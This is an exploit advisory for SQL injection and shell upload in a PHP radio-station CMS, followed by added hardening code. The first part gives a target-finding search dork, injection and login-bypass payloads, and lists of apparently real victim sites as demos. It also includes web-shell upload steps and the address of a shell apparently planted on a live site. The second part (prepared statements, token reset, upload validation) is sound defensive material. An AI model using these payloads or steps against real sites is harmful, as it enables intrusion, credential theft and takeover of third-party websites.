Web Radio CMS SQL injection

2015.03.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title: Web Radio SQL injection
[+] Exploit Author: Ashiyane Digital Security Team
[+] Date: 2015-03-12
[+] Google Dork : site:br inurl:base.php?pagina=
[+] Tested on: Kali Linux , Iceweasel
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Location : [localhost]/patch/base.php?pagina=noticia&id=[Sql Injection]
[+] Location 2 : [localhost]/patch/admin/login.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo 1 :
[+] http://radiomoaXrandu.com.br/radio/base.php?pagina=noticia&id=-108%27+union+select+1,2,@@version,4,5,6,7--+
[+] http://conexaoXnova.com.br/~usina/base.php?pagina=noticia&id=-109%27+union+select+1,@@version,3,4,5,6,7--+
[+] http://www.cXlubefm.net/base.php?pagina=noticia&id=108%27
[+] http://cidXadefmarapoti.com/base.php?pagina=noticia&id=158%27
[+] http://pXarecis90.com.br/base.php?pagina=noticia&id=186%27
[+] http://www.radioeXxtremozfm.com.br/base.php?pagina=noticia&id=121%27
[+] http://www.radioXd10fm.com/base.php?pagina=noticia&id=117%27
[+] http://www.radXioacer98fm.com.br/base.php?pagina=noticia&id=109%27
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] User , Password '=' 'or'
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo 2 :
[+] http://www.radioXfantasticafestas.com/admin/login.php
[+] http://www.cidaXdedirceufm.com/admin/login.php
[+] http://www.cluXbefm.net/admin/login.php
[+] http://www.raXdioacer98fm.com.br
[+] http://cidadeXfmarapoti.com/admin/login.php
[+] http://cultuXrafmprimavera.com.br/admin/login.php
[+] http://reXnascerfm.net/admin/login.php
[+] http://parXecis90.com.br/admin/login.php
[+] http://www.radiod10Xfm.com/admin/login.php
[+] http://radiomoaranXdu.com.br/radio/admin/login.php
[+] http://www.radiorXenovada.com/admin/login.php
[+] http://www.radioXextremozfm.com.br/admin/login.php
[+] http://www.radXiorainhafm.net.br/admin/login.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Code : login.php

<?php
include("includes/config.php");

if (isset($_POST['login'])) {
    $login = $_POST['login'];

    // Check whether the user exists: $login is concatenated straight into the
    // query with no escaping or parameter binding (CWE-89).
    $sql_busca = "SELECT * FROM user WHERE login = '$login'";
    $exe_busca = mysql_query($sql_busca) or die(mysql_error());
    $fet_busca = mysql_fetch_assoc($exe_busca);
    $num_busca = mysql_num_rows($exe_busca);

    // Check whether a row exists for the login that was entered
    if ($num_busca > 0) {
        $email = $fet_busca['email'];
        $senha = $fet_busca['senha'];
        $topico = "Esquece senha";

        $mensagem  = "<html>";
        $mensagem .= "<body>";
        $mensagem .= "<br>Voc&#234; efetuou um pedido de recuperação de senha no $nome_site.</br>";
        $mensagem .= "<br>Login: $login";
        $mensagem .= "<br>Senha: $senha</br>";
        $mensagem .= "<br><br>Site oficial do $nome_site";
        $mensagem .= "<br><a href='$site'>$site</a></br>";
        $mensagem .= "</body>";
        $mensagem .= "</html>";

        $headers  = "MIME-Version: 1.0\r\n";
        $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
        $headers .= "From: $nome_site <$email>\r\n";

        // E-mail the login and the password (stored in clear text) to the user
        mail($email, $topico, $mensagem, $headers);
        echo '<script type="text/javascript">alert("Sua senha foi enviado para seu e-mail.")</script><script>window.location="login.php";</script>';
    } else {
        echo '<script type="text/javascript">alert("Esse login não existe.")</script><script>window.location="login.php";</script>';
    }
}
?>

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Upload Your Shell To Script
[+] Login Page Admin
[+] Go To Address : [localhost]/patch/admin/index.php?sessao=admin_banner
[+] Click To Alterar
[+] Use Live Http Headers For Rename Shell JPG To PHP Ok ;)
[+] Sheller Address : [localhost]/patch/images/banners/file.php
[+] Demo Upload Sheller =
[+] http://www.casadaprXofecia.com.br/images/banners/8fdc8ec53b.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered By : Milad Hacking
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
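The root cause in login.php is that `$_POST['login']` is spliced into the query text, so a value containing a quote rewrites the WHERE clause; the same pattern is what the `id=...%27` demos exploit in base.php. The rewrite below is an added example, not the CMS's own code, showing the fix a maintainer would apply: prepared statements with bound parameters for both lookups, integer validation for `id`, and a reset token instead of mailing the stored password. It assumes `includes/config.php` provides a mysqli connection in `$mysqli` alongside `$nome_site` and `$site` (only the latter two appear in the original), that the news table is named `noticia`, and that the `user` table has `reset_token` and `reset_expires` columns and an `admin/reset.php` page for the token flow; none of those names are from the page.

```php
<?php
// Added example: hardened rewrite of the password-recovery handler shown in
// login.php, plus the integer handling the id parameter of base.php needs.
// Not the CMS's own code. Assumptions: includes/config.php provides a mysqli
// connection in $mysqli together with $nome_site and $site; the news table is
// called noticia; the user table has reset_token / reset_expires columns and
// admin/reset.php consumes the token.
include("includes/config.php");

// Look up a user by login with a parameterised query. The bound value is only
// ever compared as a string, so a quote or "' or '" in it never reaches the
// SQL parser as syntax.
function find_user_by_login(mysqli $db, string $login): ?array
{
    $stmt = $db->prepare("SELECT email FROM user WHERE login = ? LIMIT 1");
    $stmt->bind_param("s", $login);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Same treatment for the lookup behind base.php?pagina=noticia&id=...:
// anything that is not a positive integer is rejected before the query is
// built, and the value is bound with the integer type.
function find_noticia_by_id(mysqli $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM noticia WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

if (isset($_POST['login'])) {
    $login = (string) $_POST['login'];
    $user  = find_user_by_login($mysqli, $login);

    if ($user !== null) {
        // The original mails the stored password, which means it is kept in
        // clear text. Send a random, short-lived, single-use token instead and
        // store only its hash.
        $token = bin2hex(random_bytes(32));
        $hash  = hash('sha256', $token);
        $stmt  = $mysqli->prepare(
            "UPDATE user SET reset_token = ?, reset_expires = DATE_ADD(NOW(), INTERVAL 1 HOUR) WHERE login = ?"
        );
        $stmt->bind_param("ss", $hash, $login);
        $stmt->execute();
        $stmt->close();

        $link = rtrim($site, '/') . '/admin/reset.php?token=' . urlencode($token);
        $mensagem  = "<html><body>";
        $mensagem .= "<p>A password reset was requested on " . htmlspecialchars($nome_site) . ".</p>";
        $mensagem .= "<p><a href=\"" . htmlspecialchars($link) . "\">Reset your password</a> (valid for one hour).</p>";
        $mensagem .= "</body></html>";
        $headers  = "MIME-Version: 1.0\r\n";
        $headers .= "Content-type: text/html; charset=utf-8\r\n";
        mail($user['email'], "Password reset", $mensagem, $headers);
    }

    // One response for both outcomes, so the form cannot be used to find out
    // which logins exist.
    echo '<script>alert("If this login exists, a reset link has been sent to its e-mail address.");'
       . 'window.location="login.php";</script>';
}
```

The `mysql_*` functions used by the original have no parameter binding at all and were removed in PHP 7, so moving to mysqli or PDO is a prerequisite for the fix rather than a style choice. Binding with `"i"` for `id` and `"s"` for `login` means the `union select` and `'=' 'or'` payloads in the demos are stored or compared as literal text and the query structure is fixed at prepare time.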
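The banner upload described above accepts a file whose only check is the client-side name, which is why renaming a .jpg to .php in an intercepting proxy is enough to place a script under images/banners. The following is an added example, not the CMS's own code, of server-side validation that makes the client-supplied filename and Content-Type irrelevant. The form field name `banner` and the destination directory are assumptions for illustration.

```php
<?php
// Added example: server-side validation for the banner upload reached through
// index.php?sessao=admin_banner. Not the CMS's own code; the field name
// 'banner' and the storage directory are assumed for illustration.

// Image types the banner feature needs, mapped to the extension the server
// will assign. The client's filename and Content-Type are never consulted, so
// renaming a .jpg to .php in a proxy changes nothing on the server side.
const ALLOWED_BANNER_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Validates one $_FILES entry and stores it under a random, server-chosen
// name. Returns the stored filename or throws on any failed check.
function store_banner_upload(array $file, string $destDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('banner larger than 2 MiB');
    }

    // Detect the type from the file content, not from the request.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_BANNER_TYPES[$mime])) {
        throw new RuntimeException("unsupported type: $mime");
    }
    // Independent second check: the data must decode as an image.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a valid image');
    }

    // Random name with an extension fixed by the detected type; nothing from
    // the client's filename (including path components) is reused.
    $name = bin2hex(random_bytes(8)) . '.' . ALLOWED_BANNER_TYPES[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store banner');
    }
    chmod($dest, 0644);
    return $name;
}

// Usage from the banner form handler (field name 'banner' is assumed).
if (isset($_FILES['banner'])) {
    try {
        $stored = store_banner_upload($_FILES['banner'], __DIR__ . '/../images/banners');
        echo 'Stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

As defence in depth, the upload directory should also be configured so the web server never executes anything in it: on Apache a `.htaccess` in images/banners with `<FilesMatch "\.ph(p[0-9]?|tml)$"> Require all denied </FilesMatch>`, or on nginx a `location` block returning 403 for `.php` under that path. With both layers in place, a file that slips through validation is still served as static content rather than run.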


Copyright 2024, cxsecurity.com